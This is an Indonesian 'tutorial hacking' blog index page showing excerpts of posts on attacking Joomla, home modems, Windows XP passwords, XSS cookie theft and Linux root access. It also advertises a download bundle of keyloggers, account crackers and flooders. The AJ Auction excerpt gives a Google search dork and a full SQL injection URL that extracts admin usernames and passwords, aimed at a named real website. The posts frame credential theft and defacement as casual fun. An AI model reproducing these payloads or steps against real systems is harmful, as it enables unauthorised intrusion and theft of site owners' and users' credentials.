Implementasi SQL Injection pada Joomla

Implementasi SQL Injection pada Joomla Posted by Admin on June 11, 2009 in Tutorial Hacking · 7 Comments Implementasi SQL Injection pada Joomla web desain grafisApa jadinya jika admin malas mengupdate webnya? Apa jadinya jika admin tidak memperhatikan security risk yang ada? Apa jadinya jika 'the choosen one' ternyata seorang admin yang tidak tahu sama sekali mengenai system keamanan sebuah data? Ironi memang. Bahkan terkadang ada admin yang meremehkan system keamanan. Apa jadinya jika server anda memiliki konfigurasi default? Apa jadinya, apa jadinya? Dan segudang akibat dari hasil penggabungan dua kata tersebut. Yang terjadi adalah peluang seorang attacker untuk menyusup ke dalam website anda semakin memungkinkan, mengobrak-abrik server anda, bahkan tidak jarang seorang attacker mengambil...

Read the rest of this entry »

Posted in tutorial hacking

CD Hacking Tools 2010 – Gratis download

CD Hacking Tools ( Mirror was Updated )XxxPass-Team 2007Danger Cracking & Hacking Tools - Ver 1.0- Exploit Collection (4 Tools)- Google Hacking (4 Tools)- Keyloggers (5 Tools)- Binder & Packer (15 Tools)- Flood_DOS (20 Tools)- Messenger (11 Tools)- Bruter (9 Tools)- Anonimity (1 Tool)- !!! $$$ !!! (13 Tools)- AIOExploit Collection1. 10377 Exploit2. SMF ShoutBox Xss & HTML Injection3. SMF Ultimate Shoutbox Cookie Disclosure Exploit4. Firefox_BuGMessenger1. MSN Extreme 3.02. MSN Spy Lite v1.03. Yahoo Hack!4. Hotmail Email Hacker5. Hotmail Hacker Gold6. HotmailHack7. YahooUltraCracker8. winks,moods,mugins,weemees and meegos + Installer9. MSN Messenger Account Cracker v2.010. SH Yahoo Pass Sender 1.111. Yahoo Password DecoderGoogle Hacking1. Alt GooGle2. Google Version 1.23. Google...

Read the rest of this entry »

Posted in tutorial hacking

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :DSama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan : Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )Website dengan log system flat file ( diambil dari artikelnya Anggi J. )Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )Internet Password Asterisk Reveal( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe...

Read the rest of this entry »

Posted in tutorial hacking

Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue ... ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :), sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng... heuheueehuhuehuee...

Read the rest of this entry »

Posted in tutorial hacking

Sedikit penjelasan mengenai XSS vulnerability

Apaan sih XSS tuh ?Mungkin anda yang akrab dengan dunia internet pernah men dengar istilah SQL Injection, XSS atau Cross Site Scripting. 2 kelemahan atau vulnerability pada sebuah website yang kerap kali dimanfaatkan oleh para cracker untuk menjalankan aksinya. Yang konon katanya, XSS ini juga di temukan oleh Mas Dani [ XNUXER Laboratory ] ketika melakukan pen-test situs KPU.go.id beberapa tahun lalu. XSS pun bisa digunakan untuk mencuri cookies, sehingga seorang cracker bisa menggunakan identitas orang lain dengan menggunakan cookies hasil curian. XSS biasanya digunakan oleh newbie hacker yang tidak memiliki explo untuk menjalankan aksi ilegalnya. :)Maksudnya apaan sih, nggak ngerti !Singkat cerita, metode XSS dan SQL Injection digunakan untuk melakukan deface pada sebuah website. Istilah...

Read the rest of this entry »

Posted in tutorial hacking

SQL Injection AJ Auction seluruh versi

SQL Injection pada Aj Auction untuk seluruh versi.Lagi-lagi bug baru di temukan, kali ini Al-k akan coba masuksebagai admin pada situs yang memiliki bug pada halaman subcat.phplangsung aja buka google-nya ...masukkan keyword ini inurl:/subcat.php?cate_id=nah loh, dapet banyak bangett ...pilih aja salah satunya contoh :http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096setelah cate_id= di hapus aja kemudian di ganti dengan-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=listkira kira jadi beginihttp://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),password),2%20from%20admin/*&view=listnah...

Read the rest of this entry »

Posted in tutorial hacking

Jadi root di linux tanpa password

Jadi root di linux tanpa harus menggunakan passwordBoot Linux tanpa PasswordMelalui mode single pada GRUB Hi, ketemu lagi dengan saya, sikeren Al-k. ;) Sama seperti sebelum sebelumnya, yaitu artikel mengenai jebol password, tapi kali ini saya akan menjelaskannya pada Linux. Mungkin pada artikel yang lain telah di jelaskan bagaimana cara melakukan login tanpa password dengan bootloader Lilo, tapi kali ini saya akan menjelaskannya pada bootloader Grub. Beginilah caranya ... 1.) Defaultnya, pas di bootloader grub ada 2 pilihan yaitu Redhat Linux dan DOS. Pilih, yang Redhat Linux, terus tekan e di keyboard. Tombol e berguna untuk melakukan edit. 2.) http://h1.ripway.com/alk/grub.png setelah itu, pilih bagian ke 2 atau 3, disitu tertulis kernel...

Read the rest of this entry »

Posted in linux , teknolgi , tutorial hacking